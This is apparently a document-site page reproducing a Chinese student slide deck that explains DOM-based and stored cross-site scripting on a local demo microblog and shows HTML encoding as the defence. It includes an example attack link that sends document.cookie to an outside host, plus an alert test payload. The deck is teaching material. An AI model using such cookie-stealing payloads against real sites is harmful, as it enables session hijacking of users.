• / 13
  • 下载费用:5 金币  

7---XSSWITHHTML.pptx

关 键 词:
XSSWITHHTML
资源描述:
XSS WITH HTML,2015.11.14,小组成员,文章目录,XSS攻击简介XSS攻击DOM Based XSSStored XSSXSS防御XSS防御演示,XSS攻击简介,XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞。攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。,XSS攻击,XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在XSS漏洞的网站,XSS漏洞分为两种,一种是DOM Based XSS漏洞,另一种是Stored XSS漏洞。理论上,所有可输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞,漏洞的危害取决于攻击代码的威力,攻击代码也不局限于script。,DOM Based XSS,比如,自己在本地搭建一个微博网站(http://localhost:8080/weibo),首页(homepage.jsp)的源码如下所示,加粗的部分表示该网页需要接受一个名为“content”的参数。,DOM Based XSS---攻击方式1,将下面的链接发送到用户B的邮箱,http://localhost:8080/weibo/homepage.jsp?content=self.location="www.baidu.com?param="+document.cookie用户B打开该链接后,js脚本就会执行,将用户B在微博上的cookie发送到百度。效果如下图所示。,DOM Based XSS---攻击方式2,若将攻击链接改为如下,http://localhost:8080/weibo/homepage.jsp?content=alert(“xss”)用户B打开该链接后,就会进入微博界面并弹出警告,如下所示,Stored XSS,Stored XSS是存储式XSS漏洞,由于其攻击代码已经存储到服务器上或者数据库中,所以受害者是很多人。比如,我登录微博后发布了一篇文章,文章中包含了恶意代 码,如下所示,这时Tom和Jack看到了我发布的文章,当查看我的文章时就都中招了,他们的cookie信息都发送到了百度,攻击成功!这个过程中,受害者是多个人。,XSS防御,永远不相信用户的输入。需要对用户的输入进行处理,只允许输入合法的值,其它值一概过滤掉。考虑到XSS之所以会发生, 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号", “单引号”,“引号” 之类的特殊字符进行编码。,XSS防御演示,以新浪微博为例,把之前的攻击代码发布到微博上,如下所示,,XSS防御演示,发布后微博如下所示,没有攻击成功。,查看源代码,发现新浪微博把攻击代码进行了编码,如下所示,,THANK YOU !,
展开阅读全文
1
  金牌文库所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
0条评论

还可以输入200字符

暂无评论,赶快抢占沙发吧。

关于本文
本文标题:7---XSSWITHHTML.pptx
链接地址:http://www.gold-doc.com/p-256931.html
关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服客服 - 联系我们
copyright@ 2014-2018 金牌文库网站版权所有
经营许可证编号:浙ICP备15046084号-3
收起
展开